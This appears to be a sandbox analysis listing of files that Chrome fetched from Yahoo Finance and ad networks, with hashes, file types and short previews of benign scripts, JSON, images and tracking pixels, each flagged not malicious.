                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (809)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):810
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.167841344303189
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:PI27CvxwVMPeVisbJdgKLZIuxS2sT1baskGqytgeGo9ZsV:PVOg4sda6yB4eV8V
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:764F0C0A0C5802476EC6CEC9FE462F70
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:07BA3940A78404E6EBBD4B2C1BF98571FC6E786A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:CBB09BAD74030EDA7EDD74D2CB8C411B8B2F7B52B437DCD5DAC57B6F67482757
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:4DDC0DEBE4D720763D0EDE946E27F540E2D2890DDAEAA88C69DDC6C9B9815519909C28A199569AFB1A8EBD6A7109EFBBE2C4D28154C809FE4385933152DB9ADC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{d,e as p}from"./commonUtil.CI22_Irn.js";import{f as m,l as w}from"./logUtil.hOue7iAU.js";async function v(r,{path:n,reuse:f=!0,silent:g=!1}={}){var t,c;const[o]=await d(["experience"],r),a=await p(r);if(f){const e=o.getRegionData("dock");if(e)return e}try{const e=a.ynet==="1",l=(((t=r.url)==null?void 0:t.searchParams)||new URL(window.location.href).searchParams).get("expPreview"),u={product:"financeWeb",lang:a.lang,region:a.region,...n&&{path:n},...e&&l&&{preview:l}},s=await m(r,{isRelative:!0,pathname:"/xhr/experience",perfLabel:"loadPreferences",query:u},{credentials:"include"}),i=(c=s==null?void 0:s.container)==null?void 0:c.regions;return!g&&i&&o.loadExperience(i),i}catch(e){if(n&&n==="subscription-pricing")throw e;return w(r,{},{data:e,perfLabel:"loadPreferences"}),null}}export{v as l};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (835)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):836
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.244889614431222
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:K5mEpqLCTg1QiMWHWzRiad9UHVU3vMIMceTS2zJ8tYqYfJii9STxoI4hEy84IVvn:ymEi1Q9NliocV33bTuVikNwwVvn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D5BC696E4C1A7A24A20AFF3D33F6285D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:67D20FB0576C1ED36CB6805F7E62E8358F8271D6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:FC093D2D88E49E9968C3CDB4513C2997F63322D270C7A68CD36791664BF43847
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:DDE060CE2EE9F5898024978A2DA4E63F6CD0B4974F49F93DA1B549A4D77D924A225F858B230227F53B0BDA25B39E9075B053B470929A72AFBDCF18448455E0CB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/SocialIcon.DtZ2-jQM.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as c}from"./scheduler.Dr9AAxFe.js";import{S as s,i as m,c as f,b as p,m as u,t as _,a as l,d as g}from"./index.DCSmZEjO.js";import{T as k,L as b,F as i}from"./twitter-x-round.YxAnOas2.js";import{I}from"./Icon.BSWt_jx8.js";function d(a){let n,e;return n=new I({props:{icon:a[0],size:"xx-large",type:"primary"}}),{c(){f(n.$$.fragment)},l(t){p(n.$$.fragment,t)},m(t,o){u(n,t,o),e=!0},p(t,[o]){const r={};o&1&&(r.icon=t[0]),n.$set(r)},i(t){e||(_(n.$$.fragment,t),e=!0)},o(t){l(n.$$.fragment,t),e=!1},d(t){g(n,t)}}}function w(a,n,e){let{variant:t}=n,o=i;return a.$$set=r=>{"variant"in r&&e(1,t=r.variant)},a.$$.update=()=>{if(a.$$.dirty&2)switch(t){case"facebook":e(0,o=i);break;case"linkedin":e(0,o=b);break;case"twitter":e(0,o=k);break}},[o,t]}class $ extends s{constructor(n){super(),m(this,n,w,d,c,{variant:1})}}export{$ as S};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):17146
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.018456568662468
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:Rkd7haiQ5eGkT6+7nYaDc4Jn5q0ED0iOeseAoly1ANTk12kc:RI7gi5GkTZ7nYccc5qRD0PeZAow1ANr1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:1E2A117924259C32CFC0487BF5C289EA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:03FED5432FFC1698ADA39170A1EE1203B6492AF7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4728757B94952B7204C2CC913EBD5C31F94F7E502D863FFD4E89A16DB8D25951
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:A6982D4522929F82C13CE38679FF55FA43C3F127D2AC9F5815E14CC389F6D66690A4C0F40DAA7D56DF3B2240E84AB6E6DA24ABA98A07D6F4DDDB349F96BC450D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://pagead2.googlesyndication.com/getconfig/sodar?sv=200&tid=gpt&tv=m202410030101&st=env
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:{"sodar_query_id":"tYQFZ86eGI_Yx_APh-WH4Q4","injector_basename":"sodar2","bg_hash_basename":"OLU2Qs7L6j7GM-qga8AmcQGkif1_HTGLtucCbK--hhY","bg_binary":"BGTMbsMcRBStuAazk3fWZmCBW+48fjUaWoEZstbhRKqlcp2s8g2e+oAqKLIF18TuXgvCcuMipn8kXFZAX9sR5lkzk1M9AEeyWMZJEMk2zWQJPJDbcG6seBm5hfxUTiHumTUHcHeRZRH2fi8CAvx1dOY+8D4CnbFDht0+dB0JsnxtvX3eG40ipWFcLH2xnIzRsCeguJ4iggDNo0VGpUoxH6+xjoRWiFvUsUKpfE4mnjgxtx8GK3uTneZpuNnfgMMgOX/gkzlGQlSLjNjAitBOtCqEs6OIkCOQKzJ11SaJGEZum4gylcEeY+XoiMzklfyYe7zb//wumBChu2sqENZohV2XsNUeXJIWjGoCnBTlFIZcByrI4B0IhSK3v8plEdP8cYTUIoNp/j+M63R8vKcI+18fkAVRVPg+Ipi9jhuP9wfB1nPebctvCL3rGcTqkUe+cjF0RLO+bzYXKhe2nw/Q4Yy1P5cPvrSeK5e1m4M1xQegNAq/BQXWWitFB9A3sxH5KQr9PTpHmeVrDe2dIbUgRxf21ttNG6cVHuuNpa6rS54nH/ZhRlAPHYLuT7Jf72IoqPKSbTPGryrXPlP7Zkt/i1Vt+b4hWQKnaxkDlZP9c4GwBSufyrXS60qCNWIGAx1wSw+ljJGW/M5+/8HclGH5rXH4vjRJhQRa0qxAEOuJ3gWetUKOv5qc9X4104QCTMubAvbsB/LGBjcvVidcCvaA9xTUe17znWBkQwRLMJPZ2Ra+qT3Zp1caHUswPNdGChtcb1xk8wPWS5stUvPmKYK5z863d1WWngIh0QHQE7YjpwLWnG0DUaJEwRkTTW1mVtrj6vnkYW33LM527GWAN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 356x180, components 3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):30387
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.962086981467055
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:MaW+3rwxsgJH8tvbaoGGn9vw1tm2JV+qy3LGCN/aDx/aoG4nyrWliZlIv9q0VoId:z3rwN9GbaoG3e2JoqyyCNLSlIlk9q0qy
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:A1E003E5BAC428F9DDE99955A1DFF1FF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:E02332E21748F603353AEFB98DB657FFF98B41CB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:D294102BD9FFDD3086590404B218FB885B80B0F805235C32FD38E1A1C5124F51
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:8F4B0E3F3FF5B5ECEA8611E7ED4C8F78F275A38DD7871CF9FF5B5E5DE91E291C6DD086D1B612075E606C5AAD9699BC676ED3E1362B3E2CD4747EBD7B32B82C99
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:......JFIF.............C....................................................................C.........................................................................d............................................T..........................!..1A."Q.2aq...#..B....Rbr..$..35CDSc.....%&...'4EGUet..................................8.........................!..1AQ."#R..B.$2aq.3Cb4...Sc.............?..s..r.V.+y.....(...'Z-s.=:z....WwcH.._.s.N.\f......K.!G..yJ....&-.["XOM.t\.WT...J...S.......o....i.(.`.`......F.DS2b4...:-......:j..[G1g^...^B..$e.qd..J.-.\.w..=S......*.DMF./.V.:...N.*...%.'^..-..[...D.uB...Z..)X...q~..,.#.............&...)* v...:....w!..8z.U.UErR.[R..5..i..j..0.MT9.UY...I.NM=...X..V....H....t.:M:......BcG..6J...=B......P.n.'].|.fy.v.R.....)%..........fV..xkF...S.Dgi......vR.B}.....-.SU>.F{..Y...Ih.T......H.)>.....!.W.R...]W.u*&R.....n.V.[.o.U.4.}.......i.......2....`....z...L.V..9.{..,.....&..7........$%..m....R...@.....m..I............'.r:...i..=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://ade.googlesyndication.com/ddm/activity/dc_oe=ChMI7fLtwL__iAMVyquDBx3XRAhsEAAYACDej-ZqQhMI7o_hrr__iAMV_LNaBR0rDBdP;dc_eps=AHas8cCFt5pz_UyUB_4Xz6TFH4S2xY7PP4ZQuqESIAfLZN0I3ZhXXkUAMUMrIZ8exux3L7_o6YgVGosa3M9UJPBfS6k;met=1;&timestamp=1728414973198;eid1=871060;ecn1=1;etm1=0;eid2=2;ecn2=1;etm2=4;eid3=11;ecn3=1;etm3=0;eid5=12;ecn5=1;etm5=0;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkxl7/lHh/:slf/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B4491705564909DA7F9EAF749DBBFBB1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:279315D507855C6A4351E1E2C2F39DD9CD2FCCD8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4E0705327480AD2323CB03D9C450FFCAE4A98BF3A5382FA0C7882145ED620E49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B8D82D64EC656C63570B82215564929ADAD167E61643FD72283B94F3E448EF8AB0AD42202F3537A0DA89960BBDC69498608FC6EC89502C6C338B6226C8BF5E14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (552)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):86143
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.456561817569209
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:YQWyL+xpRHUkcQ5V6BJb2JIDkGXc2TjPtKZ+jLuWV6CKEJdnodQ:gKAaVH3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:0103E9F52EF96B8BF7939EEBD681D92A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:3C7DE469CB144E200BF067650FB3A1A3053640A9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EB803B33E2BC6F51CB86B2F318B3850BDED63348CC585E8E4BA0AC59AF18C5F7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:80AFAEEB3D14D8D067BF69BBCA978A4F6BAB071CC2D737323CF8981A31214131CD12EFC5DE63B78C39656C2AF7303569F152FE7DFE7F0E13F01B10836D88FD47
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://pm-widget.taboola.com/yahooweb-network/pmk-20220605.1.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:(function(){/*.. Perfect Market Widget Platform Library. Copyright (C) 2011 Perfect Market, Inc.. All Rights Reserved.. NO PERMISSION IS GRANTED TO COPY OR USE CODE EXCEPT AS IS . NECESSARY TO DISPLAY ADS IN THE NORMAL COURSE OF BROWSING A WEB SITE.. CONFIDENTIAL COPYRIGHTED AND PATENTED MATERIAL. US PATENTS 7,610,279 7,644,072 7,617,200 and 7,627,565. OTHER PATENTS PENDING.. DO NOT DECOMPILE OR REVERSE ENGINEER.*/.function m(){return function(){}}function q(b){return function(a){this[b]=a}}function s(b){return function(){return this[b]}}var _pmk=_pmk||{};window._pmk=_pmk;TBWidgetFacebook=function(){this.B="stp";this.name="facebook";this.Ma=!1;this.L=[];this.ia=[];this.Oi=this.pi=!1;this.zh=0;TBWidgetFacebook.prototype.k=m();TBWidgetFacebook.prototype.Ca=m();TBWidgetFacebook.prototype.yh=m();TBWidgetFacebook.prototype.P=function(){this.Ma=!0}};window.TBWidgetFacebook=TBWidgetFacebook;.TBVideoElem=function(b,a,c){this.Wd="none";this.rd=this.Qf="video";this.td="player-div";if(null!==b)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (24198)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):27250
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.422066925434296
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:e39Vu+xvhAOGtK0oVa7CD+SaRitSCoz+P0Yed+4JrkKstSpgVJmR/6yIhXcR0hz5:oVugL49WhWiyIheH0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:FD39F918D0957C84043CC7394111F483
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:50F312AFD12557466B10F928C6051C65B249064F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:F7968C47728F3CD9299AC231F762AD7BE904748D5CC1CB7EDB02CA6630245D09
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:FF36A079F9D106E01B4A1F238D3C9CB212C609E26B76A50B094301F9407EC8607B3751780E43095435683623AEB6DC964891717326F149D2925F6AC929D93C08
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:/*! SAFEFRAME 0.1.491 . 2024, Yahoo Inc. All rights reserved. */(()=>{var e={466:e=>{var t;(t=void 0===t?{}:t).close={name:"close",height:48,width:48,path:"M37.98 34.827l-9.9-9.9 9.9-9.898c.78-.782.78-2.05 0-2.83-.78-.78-2.047-.78-2.828 0l-9.9 9.9-9.898-9.9c-.78-.78-2.048-.78-2.828 0-.78.78-.78 2.047 0 2.828l9.9 9.9-9.9 9.898c-.78.78-.78 2.047 0 2.828.78.78 2.047.78 2.828 0l9.9-9.9 9.898 9.9c.78.78 2.048.78 2.828 0 .782-.78.782-2.047 0-2.827z"},e.exports&&(e.exports=t.close)},228:e=>{var t;(t=void 0===t?{}:t)["decline-fill"]={name:"decline-fill",height:48,width:48,path:"M24 1C11.3 1 1 11.3 1 24s10.3 23 23 23 23-10.3 23-23S36.7 1 24 1zm9.8 32.8c-.9.9-2.2.9-3.1 0L24 27l-6.8 6.8c-.9.9-2.2.9-3.1 0s-.9-2.2 0-3.1l6.8-6.8-6.7-6.7c-.9-.9-.9-2.2 0-3.1.9-.9 2.2-.9 3.1 0l6.7 6.7 6.7-6.7c.9-.9 2.2-.9 3.1 0 .9.9.9 2.2 0 3.1l-6.7 6.7 6.7 6.8c.9.9.9 2.3 0 3.1z"},e.exports&&(e.exports=t["decline-fill"])},586:(e,t,n)=>{"use strict";var o=n(427),r=n(215),i=n(945);function s(){}function a(e){return e&&"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (7977), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):7977
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.139495302416975
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:3YwuuruQt21pxX3W9pOy1zraiGzTX2mD9v6KELqGG85rF04Av:3YDuqQo1pxsOyVra7zTGmBvEzrFhAv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:69D9917872FF1011BCB87D5044F6E12D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:DB61157780300B24416F639DF9FB24C5A0829516
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:F9F7F659C467019A4E8CA49A95810AFD7BAA0A791542C4041E0C0E828A86C18D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:1F0B45E4D82F4A1BBC1CBBF6461DC069AC724D7FF1919839732CC94735034A958A40865A53F013700A3D7C3657217A199A8F8DCDAEB07BF586C1531253FCF2DE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/aaq/wf/wf-geolocation-1.3.0-modern.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-geolocation",[],t):"object"==typeof exports?exports["wafer-geolocation"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-geolocation"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(r){if(o[r])return o[r].exports;var n=o[r]={i:r,l:!1,exports:{}};return e[r].call(n.exports,n,n.exports,t),n.l=!0,n.exports}var o={};return t.m=e,t.c=o,t.d=function(e,o,r){t.o(e,o)||Object.defineProperty(e,o,{configurable:!1,enumerable:!0,get:r})},t.n=function(e){var o=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(o,"a",o),o},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,o){"use strict";function r(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):35
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9302005337813077
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkrllHh/:qJ/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C2196DE8BA412C60C22AB491AF7B1409
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:5FBD472222FEB8A22CF5B8AA5DC5B8E13AF88E2B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:6ADC3D4C1056996E4E8B765A62604C78B1F867CCEB3B15D0B9BEDB7C4857F992
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:84E24A70B78E9DE9C9D0DFEB49F3F4247DBC1C715D8844471EE40669270682E199D48F5FBEC62BD984C9C0270534B407C4D2561DD6C05ADEC3C83C1534F32D5C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://d5p.de17a.com/getuid/pubmatic?https://image2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTI3NDUmdGw9MTI5NjAw&gdpr=0&gdpr_consent=&piggybackCookie=$UID
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (1911)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1912
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.25724670362897
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:NldzXyQ3tjzY1boftAZbq0GjRi4iVRSr4c1fQv44zgF:fNXntjzY96UbR8W7FRv44zy
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:65D5557FE56B960823F6ECECE8CF41B7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:CA73EBCF155CC9566F81AEAA76134C3252A4C406
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:E77C06E8DD9CF3B2DBE40E1269171F44C3AEC19B9D1019474B55A8DF6C31C558
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:CA5BF109A03DA07F783636BCFFF912D64C350C54279DF701151681D313CE96A7D7B0ACC7CB41B218E88A42932783234A7289BDA98A7397754FB8718AFDDCA84B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{e as P,d as b,j as A,I as w,J as E}from"./commonUtil.CI22_Irn.js";import{f as k,l as g}from"./logUtil.hOue7iAU.js";async function C(n,o){var l;const{type:i="performance",pfId:f,silent:p=!1,range:m="1d",interval:h="2m",symbol:u}=o,[a,[s]]=await Promise.all([P(n),b(["portfolio"],n)]);if(!A(a)||!((l=a.user)!=null&&l.guid)||i==="quotePerformance"&&!u)return;const t={end:"2",start:"1"};f&&i==="performance"?t.pfId=f:i==="quotePerformance"&&(t.symbol=u),typeof o.start=="number"&&typeof o.end=="number"?(t.start=o.start.toString(),t.end=o.end.toString()):(t.interval=h,t.range=m);try{const r=await k(n,{crumb:!0,pathname:`/ws/portfolio-timeseries-api/v2/portfolio/${i}/chart`,perfLabel:"getPerformanceChart",query:t,timeout:5e3});if(!p){const d=w(r==null?void 0:r.chart);s.updatePerformanceChart({chart:d,pfId:f})}return r}catch(r){throw g(n,o,{data:r,perfLabel:"getPerformanceChart"}),p||s.setError(E),r}}async function I(n,o){var d;const{interval:i="5m",indicators:f="close",includeTimestamps:p
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (29171), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):29171
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.306969057375951
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
